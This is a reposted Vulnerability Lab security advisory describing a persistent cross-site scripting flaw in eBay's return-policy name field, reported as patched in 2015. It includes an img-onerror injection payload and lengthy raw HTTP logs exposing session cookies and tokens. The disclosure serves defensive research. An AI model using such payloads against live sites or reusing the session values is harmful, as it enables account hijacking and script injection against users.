Puslapiai
(Perkelti į...)
Pradinis puslapis
Nuorodos
▼
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability
Document Title: =============== Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab. Release Date: ============= 2015-03-25 Vulnerability Laboratory ID (VL-ID): ============================== ====== 1228 Common Vulnerability Scoring System: ==============================
====== 4 Product & Service Introduction: ============================== = eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/ )Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API). Vulnerability Disclosure Timeline: ============================== ==== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ============================== == Multiple application-side input validation web vulnerabilities has been discovered in the official Ebay Xcom Policy Web-Application (CMS & API). A persistent validation web vulnerability allows remote attackers to inject malicious script codes to the application-side of the affected ebay online-service. The vulnerability is located in the `my ebay account > return policy > edit returm policy module. The vulnerable input is the return policy name value. The persistent script code execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage` and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is medium. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.0. Exploitation of the persistent input validation vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] My Account > Return Policy > Edit Return Policy ( http://www.bizpolicy.ebay. ) Vulnerable Input(s): [+] Edit return policy > Policy name Vulnerable Parameter(s): [+] name Affected Module(s): [+] ebay.com/businesspolicy/manage [+] Activity Log - Item Listing > Name Proof of Concept (PoC): ======================= The application-side cross site web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Manage your business policies http://www.bizpolicy.ebay.com/ INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+ 14+Days%2C+Money +Back&catDefault=on& returnsAcceptedOption= ReturnsAccepted& returnsWithinOption=Days_14& refundOption=MoneyBack& shippingCostPaidByOption= Buyer&description=&_= 1395079926788 PoC: Manage your business policies <a href="return?totalPages=1& profileType=RETURN_POLICY& profileId=52844186015& pageNumber=1&source=manage"> Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a> --- PoC Session Logs [GET] (Injection)--- Status: 200[OK] GET http://www.bizpolicy.ebay.com/ INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+ 14+Days%2C+Money+Back+%22%3E% 3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on& returnsAcceptedOption= ReturnsAccepted& returnsWithinOption=Days_14& refundOption=MoneyBack& shippingCostPaidByOption= Buyer&description=+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[ MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header: Host[ www.bizpolicy.ebay.com ] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de-de,de;q=0. 8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[ XMLHttpRequest] Referer[ http://www.bizpolicy. ] Cookie[ebay=%5EsfLMD% 3D1391608831%5Esin%3Din%5Edv% 3D532737c1%5Esbf%3D% 23200000000000c0048002004% 5Ecos%3D1%5Ecv%3D15555%5Ejs% 3D1%5Epsi%3DAMiGpAAE*%5E; dp1=bkms/in56e99ed8^u1f/ Benjamin55086b58^tzo/- 3c532745e8^idm/153274c6b^exc/ 0%3A0%3A0%3A0534ec4d8^pcid/ 159931376355086b58^reg/% 5EflagReg%3D1%5E56e99ed8^mms/ 0.53272b71.053288945^mpc/0% 7C77533466d8^a1p/053288958^ u1p/MjAxNC5rdW56bQ**55086b58^ bl/DE56e99ed8^pbf/% 2340000000000081a8820000045508 6b58^; s= BAQAAAUSucEmyAAWAAAwAClMoiVgxM jI1NjM3OTA2APgAIFMoiVhkMGE1YWU 0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZ mU4NAAGAAFTKIlYMAFKABhTKIlYNTM yNzM3YzAuMC4xLjExLjc4LjIuMC4yA WUAAlMoiVgjMgASAApTKIlYdGVzdEN vb2tpZQA9AApTKIlYMjAxNC5rdW56b QCoAAFTKHhdMQD0ACJTKIlYJDIkQVB LaE5ZL1AkLnVqQ2dESkNIYi52bU9vN XpMUlR6MQDuAH5TKIlYMQZodHRwOi8 vbXkuZWJheS5jb20vd3MvZUJheUlTQ VBJLmRsbD9NeWVCYXkmbXllYmF5PSZ 0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlP U15ZUJheVByZWZlcmVuY2VzJnNzcGF nZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZ W5jZXMHAAEAClMoeF0yMDE0Lmt1bnp tALgADFMnOQQxMzk1MDc5MzUwOjAAA wABUyiJWDAv3s3bBB0RgoZUFN7eKtp 3q+XXQw**; nonsession= BAQAAAUSucEmyAAaAAJ0ACFUIa1gwM DAwMDAwMQC0AAFTJ0XoMAFkAANVCGt YIzhhADMACVUIa1gzNDEyOCxERVUAy wABUyc+ 4DkAmgALUynJ3TIwMTQua3Vuem1uAE AAClUIa1gyMDE0Lmt1bnptABAAClUI a1gyMDE0Lmt1bnptAPMAIlUIa1gkMi RBUEtoTlkvUCQudWpDZ0RKQ0hiLnZt T281ekxSVHoxAMoAIFyNOVhjNzdjZj NkZjE0NDBhMzU4NmMyNDRhZDRmZmZm ZmU0ZgFNABhVCGtYNTMyNzM3Y2EuMC 4xLjIuMTM2LjAuMC4yAAQAClUIWl0y MDE0Lmt1bnptAJwAOFUIa1huWStzSF oyUHJCbWRqNndWblkrc0VaMlByQTJk ajZBR2tvZW5DNWVMb1FxZGo2eDluWS tzZVE9PQFMABhVCGtYNTMyNzM3YzAu MC4xLjExLjc4LjMuMC4ymyXRGsd3A9 RVp8GyedSQ2Mpg46Y*; cssg= d0a5ae451440a428b382fe32fffffe 84; cid=xAMhIMTTiG9hpoAp% 231599313763; lucky9=9393341; npii=btguid/ c77cf3df1440a3586c244ad4fffffe 4f55086b58^cguid/ c77cfce61440a56b23d61f96fe2e02 4155086b58^; ds1=ats/1395074781098; ns1= BAQAAAUSucEmyAAaAAKUADVUIa1gxM jI1NjM3OTA2LzA7ps7P/+ muFmbIebGiTM4y7QojOkA*; secses= BAQAAAUSucEmyAAaAAUsAGFUIa1g1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjL dM4p5xXUvbFN7uT+3s6eDqkVrhQ**; shs= BAQAAAUSucEmyAAaAAVUADlMwYV01M TYyMjA1MzEwMDQsM0lQMoD56FArTr0 IRZNrcW0RgsFk; JSESSIONID= A6DA3F8E8AAAD1275E907380FF01C0 1A; ds2=sotr/b7qgDzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk% 7D%3Ee36e*715f-144d1330b33- 0x95] Set-Cookie[JSESSIONID= 5C2569C0FFBDC86ABDFC0BFBE77658 C6; Path=/ ds2=;Domain=. ebay.com ;Path=/ ds1=ats/1395074781098;Domain=. ;Path=/ ebay=%5EsfLMD%3D1391608831% 5Esin%3Din%5Esbf%3D% 23200000000000c0048002004% 5Edv%3D532737c1%5Ecos%3D1% 5Ecv%3D15555%5Ejs%3D1%5E; Domain=. ebay.com ;Path=/ cssg= d0a5ae451440a428b382fe32fffffe 84;Domain=. ebay.com ;Path=/ ns1= BAQAAAUSucEmyAAaAAKUADVUIa5MxM jI1NjM3OTA2LzA7u3yVKIuPORIyGkk Pfr8OcQuzK7o*;Domain=. ebay.com ;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/; HttpOnly dp1=bkms/in56e99f13^u1f/ Benjamin55086b93^tzo/- 3c53274623^idm/153274c6b^exc/ 0%3A0%3A0%3A0534ec513^pcid/ 159931376355086b93^reg/% 5EflagReg%3D1%5E56e99f13^mpc/ 0%7C7753346713^mms/0.53272b71. 053288945^a1p/053288993^u1p/ MjAxNC5rdW56bQ**55086b93^bl/ DE56e99f13^pbf/% 2340000000000081a8820000045508 6b93^;Domain=. ebay.com ; Expires=Wed, 16-Mar-2016 17:59:47 GMT;Path=/ s= BAQAAAUSucEmyAAWAAAwAClMoiZMxM jI1NjM3OTA2AAYAAVMoiZMwAPgAIFM oiZNkMGE1YWU0NTE0NDBhNDI4YjM4M mZlMzJmZmZmZmU4NAFKABhTKImTNTM yNzM3YzAuMC4xLjExLjc4LjIuMC4yA WUAAlMoiZMjMgASAApTKImTdGVzdEN vb2tpZQA9AApTKImTMjAxNC5rdW56b QCoAAFTKHhdMQD0ACJTKImTJDIkQVB LaE5ZL1AkLnVqQ2dESkNIYi52bU9vN XpMUlR6MQDuAH5TKImTMQZodHRwOi8 vbXkuZWJheS5jb20vd3MvZUJheUlTQ VBJLmRsbD9NeWVCYXkmbXllYmF5PSZ 0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlP U15ZUJheVByZWZlcmVuY2VzJnNzcGF nZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZ W5jZXMHAAEAClMoeF0yMDE0Lmt1bnp tALgADFMnOT8xMzk1MDc5MzUwOjAAA wABUyiJkzDDEUmmricxEndGpoBjz/ CyDgT4jg**;Domain=. ebay.com ; Path=/; HttpOnly secses= BAQAAAUSucEmyAAaAAUsAGFUIa5M1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjI kh3iWsd46p2pvujmnDykXMnpWKA**; Domain=. ebay.com ;Path=/; HttpOnly nonsession= BAQAAAUSucEmyAAaAAJ0ACFUIa5MwM DAwMDAwMQC0AAFTJ0YjMAFkAANVCGu TIzhhADMACVUIa5MzNDEyOCxERVUAy wACUyc/ GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbg BAAApVCGuTMjAxNC5rdW56bQAQAApV CGuTMjAxNC5rdW56bQDKACBcjTmTYz c3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0 ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2 hOWS9QJC51akNnREpDSGIudm1PbzV6 TFJUejEBTQAYVQhrkzUzMjczN2NhLj AuMS4yLjEzNi4wLjAuMgAEAApVCFpd MjAxNC5rdW56bQFMABhVCGuTNTMyNz M3YzAuMC4xLjExLjc4LjMuMC4yAJwA OFUIa5NuWStzSFoyUHJCbWRqNndWbl krc0VaMlByQTJkajZBR2tvZW5DNWVM b1FxZGo2eDluWStzZVE9PX7IQgibAo X1mYyjT4uLQSg4TVkI;Domain=. eba ;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/ lucky9=9393341;Domain=. ebay. ;Expires=Sat, 16-Mar-2019 17:59:47 GMT;Path=/] Content-Encoding[gzip] Content-Type[application/json; charset=UTF-8] Transfer-Encoding[chunked] Date[Mon, 17 Mar 2014 17:59:47 GMT] Server[eBay Server] Status: 200[OK] GET http://my.ebay.com/ws/ Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain] Request Header: Host[ my.ebay.com ] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0. 8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[ XMLHttpRequest] Referer[ http://my.ebay.com/ws/ ] Cookie[ebay=%5EsfLMD% 3D1391608831%5Esin%3Din%5Esbf% 3D%23200000000000c0048002004% 5Edv%3D532737c1%5Ecos%3D1% 5Ecv%3D15555%5Ejs%3D1%5E; dp1=bkms/in56e99f13^u1f/ Benjamin55086b93^tzo/- 3c53274623^idm/153274c6b^exc/ 0%3A0%3A0%3A0534ec513^pcid/ 159931376355086b93^reg/% 5EflagReg%3D1%5E56e99f13^mpc/ 0%7C7753346713^mms/0.53272b71. 053288945^a1p/053288993^u1p/ MjAxNC5rdW56bQ**55086b93^bl/ DE56e99f13^pbf/% 2340000000000081a8820000045508 6b93^; s= BAQAAAUSucEmyAAWAAAwAClMoiZMxM jI1NjM3OTA2AAYAAVMoiZMwAPgAIFM oiZNkMGE1YWU0NTE0NDBhNDI4YjM4M mZlMzJmZmZmZmU4NAFKABhTKImTNTM yNzM3YzAuMC4xLjExLjc4LjIuMC4yA WUAAlMoiZMjMgASAApTKImTdGVzdEN vb2tpZQA9AApTKImTMjAxNC5rdW56b QCoAAFTKHhdMQD0ACJTKImTJDIkQVB LaE5ZL1AkLnVqQ2dESkNIYi52bU9vN XpMUlR6MQDuAH5TKImTMQZodHRwOi8 vbXkuZWJheS5jb20vd3MvZUJheUlTQ VBJLmRsbD9NeWVCYXkmbXllYmF5PSZ 0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlP U15ZUJheVByZWZlcmVuY2VzJnNzcGF nZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZ W5jZXMHAAEAClMoeF0yMDE0Lmt1bnp tALgADFMnOT8xMzk1MDc5MzUwOjAAA wABUyiJkzDDEUmmricxEndGpoBjz/ CyDgT4jg**; nonsession= BAQAAAUSucEmyAAaAAJ0ACFUIa5MwM DAwMDAwMQC0AAFTJ0YjMAFkAANVCGu TIzhhADMACVUIa5MzNDEyOCxERVUAy wACUyc/ GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbg BAAApVCGuTMjAxNC5rdW56bQAQAApV CGuTMjAxNC5rdW56bQDKACBcjTmTYz c3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0 ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2 hOWS9QJC51akNnREpDSGIudm1PbzV6 TFJUejEBTQAYVQhrkzUzMjczN2NhLj AuMS4yLjEzNi4wLjAuMgAEAApVCFpd MjAxNC5rdW56bQFMABhVCGuTNTMyNz M3YzAuMC4xLjExLjc4LjMuMC4yAJwA OFUIa5NuWStzSFoyUHJCbWRqNndWbl krc0VaMlByQTJkajZBR2tvZW5DNWVM b1FxZGo2eDluWStzZVE9PX7IQgibAo X1mYyjT4uLQSg4TVkI; cssg= d0a5ae451440a428b382fe32fffffe 84; cid=xAMhIMTTiG9hpoAp% 231599313763; lucky9=9393341; npii=btguid/ c77cf3df1440a3586c244ad4fffffe 4f55086b58^cguid/ c77cfce61440a56b23d61f96fe2e02 4155086b58^; ds1=ats/1395074781098; ns1= BAQAAAUSucEmyAAaAAKUADVUIa5MxM jI1NjM3OTA2LzA7u3yVKIuPORIyGkk Pfr8OcQuzK7o*; secses= BAQAAAUSucEmyAAaAAUsAGFUIa5M1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjI kh3iWsd46p2pvujmnDykXMnpWKA**; shs= BAQAAAUSucEmyAAaAAVUADlMwYV01M TYyMjA1MzEwMDQsM0lQMoD56FArTr0 IRZNrcW0RgsFk; JSESSIONID= 37628EA4B997D2976280801A071E51 EE; ds2=] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C% 3Dsm%7E0a54d.g%6047- 144d1334a30-0x133] Set-Cookie[ds1=ats/ 1395074781098; Domain=. ebay.com ; Path=/ ds2=; Domain=. ebay.com ; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ ebay=%5EsfLMD%3D1391608831% 5Esbf%3D% 23200000000000c0048002004% 5Ecos%3D1%5Ecv%3D15555%5Esin% 3Din%5Ejs%3D1%5Edv%3D532737c1% 5E; Domain=. ebay.com ; Path=/ dp1=ba1p/0532889a3^bl/ DE56e99f23^kms/in56e99f23^reg/ %5EflagReg%3D1%5E56e99f23^ pcid/159931376355086ba3^mpc/0% 7C7753346723^pbf/% 2340000000000081a8820000045508 6ba3^tzo/-3c53274633^exc/0% 3A0%3A0%3A0534ec523^mms/0. 53272b71.053288945^u1p/ MjAxNC5rdW56bQ**55086ba3^u1f/ Benjamin55086ba3^idm/ 153274c6b^; Domain=. ebay.com ; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1= BAQAAAUSucEmyAAaAAKUADVUIa6MxM jI1NjM3OTA2LzA7QZZOFOpy8ayMp8o nGgFulfsBYFA*;Domain=. ebay.com ;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg= d0a5ae451440a428b382fe32fffffe 84; Domain=. ebay.com ; Path=/ s= BAQAAAUSucEmyAAWAAAEAClMoeF0yM DE0Lmt1bnptAAMAAVMoiaMwAWUAAlM oiaMjMgAGAAFTKImjMACoAAFTKHhdM QFKABhTKImjNTMyNzM3YzAuMC4xLjE xLjc4LjIuMC4yAAwAClMoiaMxMjI1N jM3OTA2AO4AflMoiaMxBmh0dHA6Ly9 teS5lYmF5LmNvbS93cy9lQmF5SVNBU EkuZGxsP015ZUJheSZteWViYXk9JnR va2VuaWQ9NDgmY3VycmVudHBhZ2U9T XllQmF5UHJlZmVyZW5jZXMmc3NwYWd lbmFtZT1zdWNjZXNzQWRQcmVmZXJlb mNlcwcAEgAKUyiJo3Rlc3RDb29raWU A9AAiUyiJoyQyJEFQS2hOWS9QJC51a kNnREpDSGIudm1PbzV6TFJUejEA+ AAgUyiJo2QwYTVhZTQ1MTQ0MGE0Mjh iMzgyZmUzMmZmZmZmZTg0ALgADFMnO U8xMzk1MDc5MzUwOjAAPQAKUyiJozI wMTQua3Vuem1Ejb6V2GvxX+ CZLB1SZINlLcDnjA**;Domain=. eba ;Path=/; HttpOnly nonsession= BAQAAAUSucEmyAAaAAEAAClUIa6MyM DE0Lmt1bnptAWQAA1UIa6MjOGEABAA KVQhaXTIwMTQua3Vuem0AygAgXI05o 2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGF kNGZmZmZmZTRmAMsAAlMnPysxMAFMA BhVCGujNTMyNzM3YzAuMC4xLjExLjc 4LjMuMC4yAU0AGFUIa6M1MzI3MzdjY S4wLjEuMi4xMzYuMC4wLjIAEAAKVQh rozIwMTQua3Vuem0AMwAJVQhrozM0M TI4LERFVQDzACJVCGujJDIkQVBLaE5 ZL1AkLnVqQ2dESkNIYi52bU9vNXpMU lR6MQC0AAFTJ+ 7wMACaAAtTKcndMjAxNC5rdW56bW4A nAA4VQhro25ZK3NIWjJQckJtZGo2d1 ZuWStzRVoyUHJBMmRqNkFHa29lbkM1 ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACF UIa6MwMDAwMDAwMTwIsT4ZdmKze+ o6aCD30vVea2+e; Domain=. ebay.com ; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses= BAQAAAUSucEmyAAaAAUsAGFUIa6M1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjJ 5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=. ebay.com ; Path=/ lucky9=9393341; Domain=. ebay.com ; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] Status: 200[OK] GET http://my.ebay.com/ws/ Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain] Request Header: Host[ my.ebay.com ] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0. 8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[ XMLHttpRequest] Referer[ http://my.ebay.com/ws/ ] Cookie[ebay=%5EsfLMD% 3D1391608831%5Esbf%3D% 23200000000000c0048002004% 5Ecos%3D1%5Ecv%3D15555%5Esin% 3Din%5Ejs%3D1%5Edv%3D532737c1% 5E; dp1=ba1p/0532889a3^bl/ DE56e99f23^kms/in56e99f23^reg/ %5EflagReg%3D1%5E56e99f23^ pcid/159931376355086ba3^mpc/0% 7C7753346723^pbf/% 2340000000000081a8820000045508 6ba3^tzo/-3c53274633^exc/0% 3A0%3A0%3A0534ec523^mms/0. 53272b71.053288945^u1p/ MjAxNC5rdW56bQ**55086ba3^u1f/ Benjamin55086ba3^idm/ 153274c6b^; s= BAQAAAUSucEmyAAWAAAEAClMoeF0yM DE0Lmt1bnptAAMAAVMoiaMwAWUAAlM oiaMjMgAGAAFTKImjMACoAAFTKHhdM QFKABhTKImjNTMyNzM3YzAuMC4xLjE xLjc4LjIuMC4yAAwAClMoiaMxMjI1N jM3OTA2AO4AflMoiaMxBmh0dHA6Ly9 teS5lYmF5LmNvbS93cy9lQmF5SVNBU EkuZGxsP015ZUJheSZteWViYXk9JnR va2VuaWQ9NDgmY3VycmVudHBhZ2U9T XllQmF5UHJlZmVyZW5jZXMmc3NwYWd lbmFtZT1zdWNjZXNzQWRQcmVmZXJlb mNlcwcAEgAKUyiJo3Rlc3RDb29raWU A9AAiUyiJoyQyJEFQS2hOWS9QJC51a kNnREpDSGIudm1PbzV6TFJUejEA+ AAgUyiJo2QwYTVhZTQ1MTQ0MGE0Mjh iMzgyZmUzMmZmZmZmZTg0ALgADFMnO U8xMzk1MDc5MzUwOjAAPQAKUyiJozI wMTQua3Vuem1Ejb6V2GvxX+ CZLB1SZINlLcDnjA**; nonsession= BAQAAAUSucEmyAAaAAEAAClUIa6MyM DE0Lmt1bnptAWQAA1UIa6MjOGEABAA KVQhaXTIwMTQua3Vuem0AygAgXI05o 2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGF kNGZmZmZmZTRmAMsAAlMnPysxMAFMA BhVCGujNTMyNzM3YzAuMC4xLjExLjc 4LjMuMC4yAU0AGFUIa6M1MzI3MzdjY S4wLjEuMi4xMzYuMC4wLjIAEAAKVQh rozIwMTQua3Vuem0AMwAJVQhrozM0M TI4LERFVQDzACJVCGujJDIkQVBLaE5 ZL1AkLnVqQ2dESkNIYi52bU9vNXpMU lR6MQC0AAFTJ+ 7wMACaAAtTKcndMjAxNC5rdW56bW4A nAA4VQhro25ZK3NIWjJQckJtZGo2d1 ZuWStzRVoyUHJBMmRqNkFHa29lbkM1 ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACF UIa6MwMDAwMDAwMTwIsT4ZdmKze+ o6aCD30vVea2+e; cssg= d0a5ae451440a428b382fe32fffffe 84; cid=xAMhIMTTiG9hpoAp% 231599313763; lucky9=9393341; npii=btguid/ c77cf3df1440a3586c244ad4fffffe 4f55086b58^cguid/ c77cfce61440a56b23d61f96fe2e02 4155086b58^; ds1=ats/1395074781098; ns1= BAQAAAUSucEmyAAaAAKUADVUIa6MxM jI1NjM3OTA2LzA7QZZOFOpy8ayMp8o nGgFulfsBYFA*; secses= BAQAAAUSucEmyAAaAAUsAGFUIa6M1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjJ 5+5WwmaLoxSDYeRvnyhWgee/Y/g**; shs= BAQAAAUSucEmyAAaAAVUADlMwYV01M TYyMjA1MzEwMDQsM0lQMoD56FArTr0 IRZNrcW0RgsFk; JSESSIONID= 37628EA4B997D2976280801A071E51 EE] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C% 3Dsm%7E0a54d.32%3Ef- 144d1334c9e-0x132] Set-Cookie[ds1=ats/ 1395074781098; Domain=. ebay.com ; Path=/ ebay=%5EsfLMD%3D1391608831% 5Esbf%3D% 23200000000000c0048002004% 5Ecos%3D1%5Ecv%3D15555%5Esin% 3Din%5Ejs%3D1%5Edv%3D532737c1% 5E; Domain=. ebay.com ; Path=/ dp1=ba1p/0532889a3^bl/ DE56e99f23^kms/in56e99f23^reg/ %5EflagReg%3D1%5E56e99f23^ pcid/159931376355086ba3^pbf/% 2340000000000081a8820000045508 6ba3^mpc/0%7C7753346723^tzo/- 3c53274633^exc/0%3A0%3A0% 3A0534ec523^mms/0.53272b71. 053288945^u1p/MjAxNC5rdW56bQ** 55086ba3^u1f/Benjamin55086ba3^ idm/153274c6b^; Domain=. ebay.com ; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1= BAQAAAUSucEmyAAaAAKUADVUIa6MxM jI1NjM3OTA2LzA7QZZOFOpy8ayMp8o nGgFulfsBYFA*;Domain=. ebay.com ;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg= d0a5ae451440a428b382fe32fffffe 84; Domain=. ebay.com ; Path=/ s= BAQAAAUSucEmyAAWAAAEAClMoeF0yM DE0Lmt1bnptAAMAAVMoiaMwAWUAAlM oiaMjMgAGAAFTKImjMACoAAFTKHhdM QFKABhTKImjNTMyNzM3YzAuMC4xLjE xLjc4LjIuMC4yAAwAClMoiaMxMjI1N jM3OTA2AO4AflMoiaMxBmh0dHA6Ly9 teS5lYmF5LmNvbS93cy9lQmF5SVNBU EkuZGxsP015ZUJheSZteWViYXk9JnR va2VuaWQ9NDgmY3VycmVudHBhZ2U9T XllQmF5UHJlZmVyZW5jZXMmc3NwYWd lbmFtZT1zdWNjZXNzQWRQcmVmZXJlb mNlcwcAEgAKUyiJo3Rlc3RDb29raWU A9AAiUyiJoyQyJEFQS2hOWS9QJC51a kNnREpDSGIudm1PbzV6TFJUejEA+ AAgUyiJo2QwYTVhZTQ1MTQ0MGE0Mjh iMzgyZmUzMmZmZmZmZTg0ALgADFMnO U8xMzk1MDc5MzUwOjAAPQAKUyiJozI wMTQua3Vuem1Ejb6V2GvxX+ CZLB1SZINlLcDnjA**;Domain=. eba ;Path=/; HttpOnly nonsession= BAQAAAUSucEmyAAaAAEAAClUIa6MyM DE0Lmt1bnptAWQAA1UIa6MjOGEABAA KVQhaXTIwMTQua3Vuem0AygAgXI05o 2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGF kNGZmZmZmZTRmAMsAAlMnPysxMAFMA BhVCGujNTMyNzM3YzAuMC4xLjExLjc 4LjMuMC4yAU0AGFUIa6M1MzI3MzdjY S4wLjEuMi4xMzYuMC4wLjIAEAAKVQh rozIwMTQua3Vuem0AMwAJVQhrozM0M TI4LERFVQDzACJVCGujJDIkQVBLaE5 ZL1AkLnVqQ2dESkNIYi52bU9vNXpMU lR6MQC0AAFTJ+ 7wMACaAAtTKcndMjAxNC5rdW56bW4A nAA4VQhro25ZK3NIWjJQckJtZGo2d1 ZuWStzRVoyUHJBMmRqNkFHa29lbkM1 ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACF UIa6MwMDAwMDAwMTwIsT4ZdmKze+ o6aCD30vVea2+e; Domain=. ebay.com ; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses= BAQAAAUSucEmyAAaAAUsAGFUIa6M1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjJ 5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=. ebay.com ; Path=/ lucky9=9393341; Domain=. ebay.com ; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] PoC: Activity log: Return Policy 1 [x] <div> <h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2> <div id="activityLogContent" class="act-cnt"> <table cellpadding="0" cellspacing="0"> <thead><tr> <th class="first">Date/Time</th> <th class="second">Action</th> <th class="third">Description</th> <th class="fourth">Report</th> </tr></thead></table> Note: After the exploitation the active log serivce is also compromised. --- PoC Session Logs [GET] --- Status: 200[OK] GET http://www.bizpolicy.ebay.com/ INJECTED SCRIPT CODE!] Load Flags[LOAD_NORMAL] Größe des Inhalts[1201] Mime Type[text/html] Request Header: Host[ www.bizpolicy.ebay.com ] 